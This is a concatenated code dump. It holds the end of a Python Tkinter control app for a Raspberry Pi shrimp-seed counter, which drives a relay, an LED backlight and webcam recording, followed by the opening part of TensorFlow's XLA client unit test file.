self.button1.buttonShow()
self.button2 = buttonL(self,[50,2],[20,602],"Hitung Benih",fontStyle,20,["#000",'#8ef695'],self.Waitcalculate)
self.button2.buttonShow()
self.button3 = buttonImg(self, 'icon/exit.png', [60,60], [920,685], ["#000", "#fff"], lambda : self.close())
self.button3.buttonShow()
def Waitcalculate(self):
self.relayState = not self.relayState
print(self.relayState)
GPIO.output(self.relay, self.relayState)
fontStyleLabel= tkFont.Font(family="Arial", size=20)
self.label3 = Label(self, text="Proses Sedang Berlangsung...", bg='#c9e4e9', fg='#08272b', font=fontStyleLabel)
self.label3.pack()
self.label3.place(x=50,y=90)
self.label2.configure(text=" ~")
fontStyleLabel= tkFont.Font(family="Arial", size=15)
self.now = datetime.now()
self.dt_string = self.now.strftime("%B %d, %Y %H:%M:%S")
self.label4 = Label( self, bg='#c9e4e9', fg='#08272b', font=fontStyleLabel)
self.label4.configure(text="Waktu:\n"+self.dt_string,justify="left")
self.label4.pack()
self.label4.place(x=50,y=530)
self.button1.stateButton("disabled")
self.button2.stateButton("disabled")
self.button3.stateButton("disabled")
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.tensorflow)
self.thread.start()
def tensorflow(self):
#================ Process ===================#
value = calculate()
self.ratarata = value
#============================================#
self.stopEvent.set()
self.Resultcalculate(self.ratarata)
def Resultcalculate(self,ratarata):
self.label3.configure(text="Proses Selesai...")
self.label2.configure(text= " " + str(ratarata))
self.button1.stateButton("active")
self.button1.buttonShow()
self.button2.stateButton("active")
self.button2.buttonShow()
self.button3.stateButton("active")
time.sleep(3)
self.label3.configure(text="")
self.relayState = not self.relayState
print(self.relayState)
GPIO.output(self.relay, self.relayState)
def close(self):
subprocess.run('sudo shutdown -h now', shell=True)
class Page1(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
self.videoObj = None
self.colorSelected = ''
self.backColor = "0,0,0"
self.cameraFlag = False
self.ledFlag = False
self.count = 0
self.relayState = False
self.relay = relay
self.configure(bg="#444")
fontStyle = tkFont.Font(family= "Arial", size=28, weight="bold")
fontStyleLabel = tkFont.Font(family = "Arial", size = 19)
# ---------------------- comboBox -------------------------
#self.selectColor = tk.StringVar()
#self.selectColor.set('putih')
#colorBox = ttk.Combobox(self, textvariable=self.selectColor, state = 'readonly', width = 27, font = 'Arial 25')
#colorBox['values'] = ('putih', 'kuning', 'hijau', 'biru', 'merah')
#colorBox.pack(ipadx = 15, pady = 25)
#colorBox.place(x= 10, y = 90)
#colorBox.bind('<<ComboboxSelected>>', self.colorSelect)
# ----------------------- slider ---------------------------
redLabel = sliderLabel(self, labelText="Merah", bgColor='#444', labelPosition = [255,50], labelFont = "Arial", labelFontSize = 21)
greenLabel = sliderLabel(self, labelText="Hijau", bgColor='#444', labelPosition = [550,50], labelFont = "Arial", labelFontSize = 21)
blueLabel = sliderLabel(self, labelText="Biru", bgColor='#444', labelPosition = [845,50], labelFont = "Arial", labelFontSize = 21)
self.redNow = tk.DoubleVar()
self.greenNow = tk.DoubleVar()
self.blueNow = tk.DoubleVar()
self.red = ttk.Scale(self, from_=0, length = 250, to=255, orient='horizontal', command=self.getRedColor, variable=self.redNow)
self.red.place(x=170,y=90)
self.green = ttk.Scale(self, from_=0, length = 250, to=255, orient='horizontal', command=self.getGreenColor, variable=self.greenNow)
self.green.place(x=460,y=90)
self.blue = ttk.Scale(self, from_=0, length = 250, to=255, orient='horizontal', command=self.getBlueColor, variable=self.blueNow)
self.blue.place(x=750,y=90)
self.redValue = Label(self, text="0", bg='#444', fg='#fff', font=fontStyleLabel)
self.redValue.place(x=270,y=120)
self.greenValue = Label(self, text="0", bg='#444', fg='#fff', font=fontStyleLabel)
self.greenValue.place(x=560,y=120)
self.blueValue = Label(self, text="0", bg='#444', fg='#fff', font=fontStyleLabel)
self.blueValue.place(x=850,y=120)
label1 = Label(self, text="Pastikan Wadah Benih\nUdang Terlihat Jelas\nMelalui Kamera", bg='#444', fg='#fff', font=fontStyleLabel)
label1.pack()
label1.place(x=730,y=180)
self.back = buttonImg(self,'icon/home.png', [130,130], [780,570], ["#000", "#fff"], lambda : [controller.show_frame(StartPage), videoStream.onClose(self.videoObj)])
self.back.buttonShow()
self.ledButton = buttonImg(self,'icon/sun.png', [80,80], [35,50], [BlackSolid,"#fff"], lambda : [self.ledState()])
self.ledButton.buttonShow()
self.button2 = buttonL(self,[16,2],[710,310],"Camera On",fontStyle,18,[BlackSolid,_from_rgb((244,239,140))],lambda : [self.cameraState()])
self.button2.buttonShow()
button3 = buttonL(self,[16,2],[710,450],"Record",fontStyle,18,[BlackSolid,_from_rgb((255,190,100))],lambda : [self.startRecord()])
button3.buttonShow()
self.videoObj = videoStream()
# If you use combobox
def colorSelect(self, event = None):
self.colorSelected = self.selectColor.get()
#print(self.colorSelected)
for color in colorChoice.keys():
if(self.colorSelected == color):
self.backColor = colorChoice.get(self.colorSelected)
print(str(colorChoice.get(self.colorSelected)))
ser.write(self.backColor.encode())
# If you use trackbar
def getRedColor(self, event = None):
self.redValue.configure(text= '{:d}'.format(round(self.redNow.get())))
self.backColor = str(round(self.redNow.get())) + "," + str(round(self.greenNow.get())) + "," + str(round(self.blueNow.get()))
sendRed = "@" + str(round(self.redNow.get())) + "$\n"
print(sendRed)
ser.write(sendRed.encode())
def getGreenColor(self, event = None):
self.greenValue.configure(text= '{:d}'.format(round(self.greenNow.get())))
self.backColor = str(round(self.redNow.get())) + "," + str(round(self.greenNow.get())) + "," + str(round(self.blueNow.get()))
sendGreen = "#" + str(round(self.greenNow.get())) + "$\n"
print(sendGreen)
ser.write(sendGreen.encode())
def getBlueColor(self, event = None):
self.blueValue.configure(text= '{:d}'.format(round(self.blueNow.get())))
self.backColor = str(round(self.redNow.get())) + "," + str(round(self.greenNow.get())) + "," + str(round(self.blueNow.get()))
sendBlue = "&" + str(round(self.blueNow.get())) + "$\n"
print(sendBlue)
ser.write(sendBlue.encode())
def cameraState(self, event = None):
self.cameraFlag = not(self.cameraFlag)
print(self.cameraFlag)
if(self.cameraFlag):
self.button2.buttonUpdate("Camera Off", _from_rgb((255,150,150)))
videoStream.onStart(self.videoObj, cameraFlag = self.cameraFlag)
else:
self.button2.buttonUpdate("Camera On", _from_rgb((244,239,140)))
videoStream.onStart(self.videoObj, cameraFlag = self.cameraFlag)
def ledState(self, event = None):
self.ledFlag = not(self.ledFlag)
print(self.ledFlag)
if(self.ledFlag):
self.relayState = not self.relayState
print(self.relayState)
GPIO.output(self.relay, self.relayState)
self.ledButton.buttonUpdate(_from_rgb((244,239,140)))
else:
self.relayState = not self.relayState
print(self.relayState)
GPIO.output(self.relay, self.relayState)
self.ledButton.buttonUpdate("#fff")
def startRecord(self, event = None):
self.count += 1
videoStream.onStart(self.videoObj, bgColor = self.backColor, recordCount = self.count, recordTime = 15, record = "yes")
class videoStream(tk.Frame):
def __init__(self):
self.ret = None
self.frame = None
self.thread = None
self.stopEvent = None
self.capWebcam = None
self.fourcc = None
self.out = None
self.time = datetime.now()
self.timeString = self.time.strftime("%d-%B-%Y %H:%M:%S")
self.now = None
self.check = 0
self.count = 0
self.panel = None
def onStart(self, bgColor = '255,255,255', recordCount = 0, recordTime = 1, record = "no", cameraFlag = False):
self.record = record
self.recordCount = recordCount
self.recordTime = recordTime * 60 * 1000 # minutes from ms
self.outVideo = "record/" + bgColor + " - " + self.timeString + "(" + str(self.recordCount) + ").mp4"
self.message = "perekaman video berdurasi " + str(recordTime) + " menit dimulai ..."
if((self.record == "no") and (cameraFlag == True)):
self.capWebcam = cv2.VideoCapture(0)
#if not self.capWebcam.isOpened():
# messagebox.showerror("Error !", "Kamera tidak terhubung ! Harap memeriksa koneksi kamera ...")
# raise Exception("Could not open video device")
self.capWebcam.set(3, 656)
self.capWebcam.set(4, 600)
#self.capWebcam.set(cv2.CAP_PROP_AUTOFOCUS, 0)
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.videoLoop)
self.thread.start()
elif(self.record == "yes"):
self.capWebcam = cv2.VideoCapture(0)
if not self.capWebcam.isOpened():
messagebox.showerror("Error !", "Kamera tidak terhubung ! Harap memeriksa koneksi kamera ...")
raise Exception("Could not open video device")
messagebox.showinfo("notification", self.message)
self.capWebcam.set(3,1920)
self.capWebcam.set(4,1080)
#self.capWebcam.set(cv2.CAP_PROP_AUTOFOCUS, 0)
self.fourcc = cv2.VideoWriter_fourcc(*'XVID')
self.out = cv2.VideoWriter(self.outVideo, self.fourcc, 5.0, (1920,1080))
self.prev = int(round(time.time() * 1000))
self.stopEvent = threading.Event()
self.thread = threading.Thread(target=self.recordVideo)
self.thread.start()
else:
self.capWebcam.release()
def onClose(self):
print("[INFO] closing...")
if not self.panel == None:
self.panel.destroy()
self.stopEvent.set()
self.capWebcam.release()
def videoLoop(self):
try:
# keep looping over frames until we are instructed to stop
while not self.stopEvent.is_set():
self.ret,self.frame = self.capWebcam.read()
print(self.ret)
if(self.ret==True):
image = cv2.flip(self.frame, 1)
# backlight check wether the led is on or not, light intensity threshold - 30 per pixel
#self.check = checkBacklight(self.frame)
#if(self.check < 16000):
# messagebox.showerror("Error !", "Backlight tidak menyala ! Harap memeriksa sambungan backlight ...")
# self.capWebcam.release()
# break
#self.check = 0
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
# if the panel is not None, we need to initialize it
if self.panel is None:
self.panel = Label(image=image,width=660,height=550)
self.panel.image = image
self.panel.place(x=35,y=160)
# otherwise, simply update the panel
else:
if(not self.panel == None):
self.panel.configure(image=image)
self.panel.image = image
else:
self.panel.destroy()
self.capWebcam.release()
self.panel = None
except RuntimeError:
print("[INFO] caught a RuntimeError")
def recordVideo(self):
try:
# keep looping over frames until we are instructed to stop
while not self.stopEvent.is_set():
self.ret,self.frame = self.capWebcam.read()
if(self.ret==True):
image = cv2.flip(self.frame, 1)
# backlight check wether the led is on or not, light intensity threshold - 30 per pixel
#self.check = checkBacklight(self.frame)
#if(self.check < 16000):
# messagebox.showerror("Error !", "Backlight tidak menyala ! Harap memeriksa sambungan backlight ...")
# self.capWebcam.release()
# break
#self.check = 0
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
self.now = int(round(time.time() * 1000))
if(self.now - self.prev <= self.recordTime):
self.out.write(self.frame)
if self.panel is None:
self.panel = Label(image=image,width=660,height=550)
self.panel.image = image
self.panel.place(x=35,y=160)
# otherwise, simply update the panel
else:
if(not self.panel == None):
self.panel.configure(image=image)
self.panel.image = image
else:
self.now = 0
self.panel.destroy()
self.capWebcam.release()
self.panel = None
self.message = "Perekaman Selesai ..."
messagebox.showinfo("notification", self.message)
break
except RuntimeError:
print("[INFO] caught a RuntimeError")
app = framecontroller()
app.mainloop()
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend,
cloud_tpu=False,
tfrt_tpu=False,
external_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_] + complex_dtypes
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool_ dtype."""
return np.array(*args, dtype=np.bool_, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testStableComputationSerialization(self):
# Ideally we would test identical computations produced in different
# processes. For now we have this limited smoke test.
computation = self.ExampleComputation()
ref = computation.as_serialized_hlo_module_proto()
for _ in range(10):
self.assertEqual(computation.as_serialized_hlo_module_proto(), ref)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
],
api_version=xla_client.ops.CustomCallApiVersion
.API_VERSION_STATUS_RETURNING)
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class PythonCallbackTest(ComputationTest):
def testPythonCallback(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
f = lambda x, y: (x + y, x - y)
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
arg1 = np.array([10, 15, -2, 7], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
p1 = ops.Parameter(c, 1, shape)
out, keepalive = self.backend.emit_python_callback(
f, c, [p0, p1], [shape, shape])
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 + arg1, arg0 - arg1])
del out, keepalive
def testTokens(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x, y):
assert y is None, y
return None, x + 1
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
token_shape = xla_client.Shape.token_shape()
p0 = ops.Parameter(c, 0, shape)
token = ops.CreateToken(c)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0, token], [token_shape, shape])
out = ops.GetTupleElement(out, 1)
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 + 1])
del out, keepalive
def testStriding(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
assert x.flags.f_contiguous, x.strides
# Force the output array to have C layout, which will require a
# transpose back to the expected Fortran layout.
return np.ascontiguousarray(x * 2),
arg0 = np.arange(12, dtype=np.int16).reshape(3, 4)
shape_f_layout = xla_client.Shape.array_shape(
arg0.dtype, arg0.shape, layout=(0, 1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape_f_layout], [shape_f_layout])
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 * 2])
del out, keepalive
tests.append(PythonCallbackTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testXlaShapeIndex(self):
a = xla_client.ShapeIndex((1, 2))
b = xla_client.ShapeIndex((1, 2))
c = xla_client.ShapeIndex((2, 3))
self.assertEqual(a, b)
self.assertNotEqual(b, c)
def testLayout(self):
f32 = xla_client.PrimitiveType.F32
a = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
b = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
c = xla_client.Shape.array_shape(f32, (2, 3), (1, 0)).layout()
self.assertEqual(a.minor_to_major(), (0, 1))
self.assertEqual(b.minor_to_major(), (0, 1))
self.assertEqual(c.minor_to_major(), (1, 0))
self.assertEqual(a, b)
self.assertNotEqual(a, c)
self.assertNotEqual(b, c)
self.assertEqual(hash(a), hash(b))
self.assertNotEqual(hash(a), hash(c))
self.assertNotEqual(hash(b), hash(c))
def testBlockUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
